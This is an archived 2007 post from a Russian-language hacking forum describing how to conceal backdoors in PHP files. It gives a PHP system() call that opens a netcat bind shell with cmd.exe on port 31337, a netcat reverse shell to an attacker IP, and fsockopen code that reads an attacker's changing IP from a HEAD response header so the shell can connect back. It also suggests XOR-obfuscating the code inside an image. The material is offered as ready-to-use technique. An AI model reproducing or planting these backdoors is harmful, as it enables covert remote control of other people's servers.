ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
Перезагрузить страницу php - скрываем начинку
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Пряники)
  #2  
Старый 18.03.2007, 00:33
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию Пряники)
Вкусности, для начала солененькие
PHP код:
<? system('C:\nc\nc -l -p 31337 -d -e cmd.exe -L'); ?>
теперь немного вкуснее:
локально:
nc -l -n -v -p 80
в код:
nc -e /bin/sh 10.31.3.37 80
тоже солено, скажете вы? ну чтож, а если айпишка кулхацкера динамическая? подсластим раствор:
с помощью сокетов или fopen открываем файл на удаленном сайте с нашим айпи, к которому будем коннектиться. думаете юзать GET, так? а нафиг читали вот это: http://forum.antichat.ru/thread35180.html ???
конечно же юзаем метод HEAD )
итак, код серверного сценария:
PHP код:
<?
header('Root: 127.0.0.1');
?>
единственной строчкой с полезной нагрузкой мы выставляем ответное поле хедера - наш айпи, теперь что сунем в контейнер кода - нашу пикчу:
PHP код:
<?php
// открываем сокет на хост: локалост и на 80 порт (стандартный веб)
    $fp fsockopen('lamo.my'80$errno$errstr30); 
    // Проверяем успешность установки соединения
    if (!$fp) echo "$errstr ($errno)<br />\n"
    else
    { 
      $headers "HEAD /server.php HTTP/1.1\r\n"// отвечает за тип протокола!
      $headers .= "Host: lamo.my\r\n"
      $headers .= "Connection: Close\r\n\r\n"
      // Отправляем HTTP-запрос серверу
      fwrite($fp$headers); 
      // Получаем ответ
      $line='';
      while (!feof($fp))
      { 
        $line .= fgets($fp1024); 
      } 
      fclose($fp); 
    } 
    echo $line;
?>
естественно, вместо просто вывода инфы наподобие:
Цитата:
HTTP/1.1 200 OK
Date: Sat, 17 Mar 2007 20:26:49 GMT
Server: Apache/1.3.33 (Win32) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Root: 127.0.0.1
Connection: close
Content-Type: text/html
выдираем нужный айпи, и коннектимся к нему.
насчет элементарности - согласен, только 1 вещь - это модель, лучше конечно юзать отксоренный участок кода пикчи (конечно, с оговорками - мы не должны получить "лишнего кода") но, как говорится, все гениальное просто
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ